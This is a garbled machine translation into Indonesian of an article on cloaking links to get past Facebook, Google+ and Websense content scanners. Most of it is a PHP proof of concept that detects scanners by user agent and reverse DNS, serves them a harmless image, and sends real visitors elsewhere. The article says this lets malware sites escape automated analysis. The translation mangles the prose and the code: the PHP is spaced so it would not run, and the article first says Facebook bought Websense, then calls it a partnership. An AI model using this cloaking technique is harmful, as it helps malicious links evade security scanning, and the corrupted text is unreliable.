Facebook pembatasan konten memotong Kerentanan

       Blackhat.u.s.a Akademi mengklaim telah menemukan cara untuk memotong pembatasan konten pada link, seperti yang diposting di theirsite dan posting menempatkan di dinding publik pengguna. Bahkan Analis Keamanan mengklaim bahwa Facebook telah diberitahu tentang kerentanan ini pada 31 Juli 2011.

 

Facebook baru-baru ini telah membeli Websense untuk mencoba untuk mendorong kerentanan ini di bawah karpet, namun masih mengeksploitasi works.To akses Facebook FQL API, facebook bahkan begitu baik untuk memberikan referensi tabel dan kolom dalam dokumentasi untuk FQL. FQL tidak memungkinkan penggunaan BERGABUNG, namun tidak diperlukan karena semuanya secara menyeluruh didokumentasikan. Penyerang dapat menyalahgunakan ini selama pembuatan aplikasi Facebook berbahaya atau langsung di halaman api pengembangan FQL untuk mengumpulkan informasi. :

<? php

# User agent metode memeriksa

$ fb_string = '/ facebookexternal / i'; # Menunjukkan facebookexternal di agen pengguna facebook konten pemindai

$ gplus_string = '/ Feedfetcher-Google / i'; # Googleplus muncul di agen pengguna juga.

# RDNS Metode Lookup

$ host_websense = '/websense.com/i'; # Memeriksa rDNS untuk filter Websense

$ host_fb = '/tfbnw.net/i'; # Memeriksa rDNS untuk tfbnw.net - tuan facebook

# Load sifat permintaan

$ u_agent = $ _SERVER ['HTTP_USER_AGENT'];

$ u_ref = $ _SERVER ['HTTP_REFERER'];

$ u_host = gethostbyaddr ($ _ SERVER ['REMOTE_ADDR']);

# Jika kita datang dari atau facebook atau Websense atau google ditambah,

if (preg_match ($ host_fb, $ u_host) || preg_match ($ host_websense, $ u_host) || preg_match ($ fb_string, $ u_agent) || preg_match ($ gplus_string, $ u_agent)) {

    # Tampilan gambar

    header ('Content-Type: image / jpeg');

    readfile ('/var/www/localhost/cute_kitten.jpeg');

} Else {

    # Rickroll pengguna tidak curiga ini

    header ('Location: http://www.youtube.com/watch?v=dQw4w9WgXcQ&ob=av3e');

}

?>

    Sementara sebagian besar situs utama yang memungkinkan pengiriman link rentan terhadap metode ini, situs termasuk Websense, Google+, dan Facebook membuat permintaan mudah diidentifikasi. Situs-situs tersebut mengirim permintaan awal untuk link untuk menyimpan thumbnail cermin gambar, atau snapshot dari situs yang terhubung. Dengan demikian, banyak menggunakan agen pengguna kustom, atau memiliki alamat IP yang memutuskan untuk nama domain yang konsisten. Alamat facebook IP memutuskan untuk tfbnw.net, juga menetapkan agen pengguna kustom dari "facebookexternalhit" .google + (31 juga diberitahu Juli dan bersalah perawatan wajar) lagi berikut jas dan memanfaatkan "Feedfetcher-Google" sebagai agen pengguna mereka. Mengetahui hal ini, kita dapat dengan mudah menyaring permintaan yang datang dari situs ini, dan menawarkan sebuah gambar yang sah yang akan ditampilkan di situs mereka, sementara mengarahkan atau menampilkan halaman yang sama sekali berbeda kepada siapapun yang mengikuti link. Kemitraan Facebook baru-baru ini dengan Websense menggelikan, karena Websense ini "ACE" keamanan pemindai yang dengan mudah diidentifikasi, dengan menggunakan gethostbyaddr untuk menyelesaikan IP kembali ke websense.com. Memanfaatkan teknik ini akan memungkinkan sejumlah besar situs malware untuk tetap tidak terdeteksi analisis situs otomatis mereka. Tempat lain seperti digg.com baik spoof agen pengguna untuk terlihat seperti lalu lintas normal, atau meneruskan agen pengguna klien, yang membuatnya lebih sulit untuk menangkap setiap orang dari permintaan mereka. Untungnya, digg.com hanya meminta link sekali, sebelum mengirimkan link ke dunia. Hal ini memungkinkan penyerang untuk melayani sampai gambar yang sah sampai bahwa permintaan awal membersihkan server kami, dan kemudian menggantinya dengan kurang dari berkas jujur. Kami telah sayang bernama kelas kerentanan ini Cross-Site Content Forgery.Proof Konsep dapat seenhere.